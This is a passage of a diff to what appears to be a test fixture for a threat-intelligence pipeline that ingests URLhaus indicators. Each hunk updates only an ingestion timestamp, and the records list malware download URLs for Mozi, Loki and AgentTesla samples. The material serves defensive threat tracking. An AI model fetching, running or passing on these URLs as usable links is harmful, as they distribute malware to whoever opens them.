UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29829,7 +29829,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029147800Z", + "ingested": "2021-12-14T14:56:15.726653216Z", "original": "{\"id\":\"960939\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960939/\",\"url\":\"http://89.160.20.156:32954/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -29878,7 +29878,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029154400Z", + "ingested": "2021-12-14T14:56:15.726653740Z", "original": "{\"id\":\"960933\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960933/\",\"url\":\"http://89.160.20.156:57752/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29927,7 +29927,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029161Z", + "ingested": "2021-12-14T14:56:15.726654102Z", "original": "{\"id\":\"960932\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960932/\",\"url\":\"http://89.160.20.156:52221/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29976,7 +29976,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029167900Z", + "ingested": "2021-12-14T14:56:15.726654472Z", "original": "{\"id\":\"960931\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960931/\",\"url\":\"http://89.160.20.156:58493/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:40 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -30025,7 +30025,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029174500Z", + "ingested": "2021-12-14T14:56:15.726654831Z", "original": "{\"id\":\"960930\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960930/\",\"url\":\"http://89.160.20.156:57603/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30074,7 +30074,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029181100Z", + "ingested": "2021-12-14T14:56:15.726655207Z", "original": "{\"id\":\"960929\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960929/\",\"url\":\"http://89.160.20.156:45439/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30123,7 +30123,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029187700Z", + "ingested": "2021-12-14T14:56:15.726655612Z", "original": "{\"id\":\"960928\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960928/\",\"url\":\"http://89.160.20.156:58291/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -30172,7 +30172,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029194400Z", + "ingested": "2021-12-14T14:56:15.726655968Z", "original": "{\"id\":\"960927\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960927/\",\"url\":\"http://89.160.20.156:52785/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30221,7 +30221,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029201100Z", + "ingested": "2021-12-14T14:56:15.726656330Z", "original": "{\"id\":\"960924\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960924/\",\"url\":\"http://89.160.20.156:38582/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30270,7 +30270,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029207700Z", + "ingested": "2021-12-14T14:56:15.726656762Z", "original": "{\"id\":\"960925\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960925/\",\"url\":\"http://89.160.20.156:39503/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -30319,7 +30319,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029214300Z", + "ingested": "2021-12-14T14:56:15.726657237Z", "original": "{\"id\":\"960926\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960926/\",\"url\":\"http://89.160.20.156:53018/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30368,7 +30368,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029220900Z", + "ingested": "2021-12-14T14:56:15.726657608Z", "original": "{\"id\":\"960923\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960923/\",\"url\":\"http://89.160.20.156:40698/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30417,7 +30417,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029227400Z", + "ingested": "2021-12-14T14:56:15.726657981Z", "original": "{\"id\":\"960922\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960922/\",\"url\":\"http://89.160.20.156:50060/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -30466,7 +30466,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029234100Z", + "ingested": "2021-12-14T14:56:15.726658351Z", "original": "{\"id\":\"960921\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960921/\",\"url\":\"http://89.160.20.156:47874/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30514,7 +30514,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029240700Z", + "ingested": "2021-12-14T14:56:15.726658726Z", "original": "{\"id\":\"960919\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960919/\",\"url\":\"http://perezluzwsdycafeyzmn.dns.navy/perdoc/regasm.exe\",\"url_status\":\"online\",\"host\":\"perezluzwsdycafeyzmn.dns.navy\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\",\"opendir\"]}", "category": "threat", "type": "indicator", @@ -30564,7 +30564,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029247200Z", + "ingested": "2021-12-14T14:56:15.726659087Z", "original": "{\"id\":\"960920\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960920/\",\"url\":\"http://89.160.20.156:33799/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:46:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", 
@@ -30611,7 +30611,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029253900Z", + "ingested": "2021-12-14T14:56:15.726659463Z", "original": "{\"id\":\"960918\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960918/\",\"url\":\"http://kalamikwsdyonlinedws.dns.navy/kaladoc/vbc.exe\",\"url_status\":\"online\",\"host\":\"kalamikwsdyonlinedws.dns.navy\",\"date_added\":\"2021-01-14 15:45:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"AgentTesla\",\"exe\"]}", "category": "threat", "type": "indicator", @@ -30659,7 +30659,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029260500Z", + "ingested": "2021-12-14T14:56:15.726659835Z", "original": "{\"id\":\"960917\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960917/\",\"url\":\"http://89.160.20.156/js/js/lokkk.jpg\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:45:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"exe\",\"Loki\"]}", "category": "threat", "type": "indicator", @@ -30708,7 +30708,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029267200Z", + "ingested": "2021-12-14T14:56:15.726660202Z", "original": "{\"id\":\"960916\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960916/\",\"url\":\"http://89.160.20.156:33201/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -30757,7 +30757,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029273800Z", + "ingested": "2021-12-14T14:56:15.726660579Z", "original": "{\"id\":\"960914\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960914/\",\"url\":\"http://89.160.20.156:53926/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30806,7 +30806,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029280400Z", + "ingested": "2021-12-14T14:56:15.726660948Z", "original": "{\"id\":\"960915\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960915/\",\"url\":\"http://89.160.20.156:43917/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30855,7 +30855,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029287Z", + "ingested": "2021-12-14T14:56:15.726661319Z", "original": "{\"id\":\"960911\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960911/\",\"url\":\"http://89.160.20.156:42053/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -30904,7 +30904,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029293600Z", + "ingested": "2021-12-14T14:56:15.726661689Z", "original": "{\"id\":\"960912\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960912/\",\"url\":\"http://89.160.20.156:57875/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -30953,7 +30953,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029300100Z", + "ingested": "2021-12-14T14:56:15.726662060Z", "original": "{\"id\":\"960913\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960913/\",\"url\":\"http://89.160.20.156:35523/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31002,7 +31002,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029306800Z", + "ingested": "2021-12-14T14:56:15.726662445Z", "original": "{\"id\":\"960910\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960910/\",\"url\":\"http://89.160.20.156:47418/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:38:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", 
@@ -31051,7 +31051,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029313500Z", + "ingested": "2021-12-14T14:56:15.726662808Z", "original": "{\"id\":\"960908\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960908/\",\"url\":\"http://89.160.20.156:53007/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31100,7 +31100,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029320200Z", + "ingested": "2021-12-14T14:56:15.726663173Z", "original": "{\"id\":\"960909\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960909/\",\"url\":\"http://89.160.20.156:38089/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31149,7 +31149,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029327Z", + "ingested": "2021-12-14T14:56:15.726663535Z", "original": "{\"id\":\"960904\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960904/\",\"url\":\"http://89.160.20.156:35243/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -31198,7 +31198,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029333600Z", + "ingested": "2021-12-14T14:56:15.726663919Z", "original": "{\"id\":\"960905\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960905/\",\"url\":\"http://89.160.20.156:50589/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31247,7 +31247,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029340100Z", + "ingested": "2021-12-14T14:56:15.726664315Z", "original": "{\"id\":\"960906\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960906/\",\"url\":\"http://89.160.20.156:42479/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31296,7 +31296,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029346700Z", + "ingested": "2021-12-14T14:56:15.726664683Z", "original": "{\"id\":\"960907\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960907/\",\"url\":\"http://89.160.20.156:43425/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -31345,7 +31345,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029353200Z", + "ingested": "2021-12-14T14:56:15.726665048Z", "original": "{\"id\":\"960903\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960903/\",\"url\":\"http://89.160.20.156:35013/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:36:28 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31394,7 +31394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029359800Z", + "ingested": "2021-12-14T14:56:15.726665429Z", "original": "{\"id\":\"960902\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960902/\",\"url\":\"http://89.160.20.156:35298/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31443,7 +31443,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029366400Z", + "ingested": "2021-12-14T14:56:15.726665801Z", "original": "{\"id\":\"960900\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960900/\",\"url\":\"http://89.160.20.156:54174/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -31492,7 +31492,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029373100Z", + "ingested": "2021-12-14T14:56:15.726666183Z", "original": "{\"id\":\"960901\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960901/\",\"url\":\"http://89.160.20.156:42768/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31541,7 +31541,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029379700Z", + "ingested": "2021-12-14T14:56:15.726666540Z", "original": "{\"id\":\"960898\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960898/\",\"url\":\"http://89.160.20.156:59110/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31590,7 +31590,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029386400Z", + "ingested": "2021-12-14T14:56:15.726666905Z", "original": "{\"id\":\"960899\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960899/\",\"url\":\"http://89.160.20.156:51476/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -31639,7 +31639,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029392900Z", + "ingested": "2021-12-14T14:56:15.726667292Z", "original": "{\"id\":\"960897\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960897/\",\"url\":\"http://89.160.20.156:58839/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31688,7 +31688,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029399500Z", + "ingested": "2021-12-14T14:56:15.726667654Z", "original": "{\"id\":\"960894\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960894/\",\"url\":\"http://89.160.20.156:50249/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31737,7 +31737,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029406Z", + "ingested": "2021-12-14T14:56:15.726668016Z", "original": "{\"id\":\"960895\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960895/\",\"url\":\"http://89.160.20.156:46173/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -31786,7 +31786,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029412600Z", + "ingested": "2021-12-14T14:56:15.726668388Z", "original": "{\"id\":\"960896\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960896/\",\"url\":\"http://89.160.20.156:43785/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31835,7 +31835,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029419100Z", + "ingested": "2021-12-14T14:56:15.726668759Z", "original": "{\"id\":\"960893\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960893/\",\"url\":\"http://89.160.20.156:46924/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -31884,7 +31884,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029425700Z", + "ingested": "2021-12-14T14:56:15.726669160Z", "original": "{\"id\":\"960892\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960892/\",\"url\":\"http://89.160.20.156:59734/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:34:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
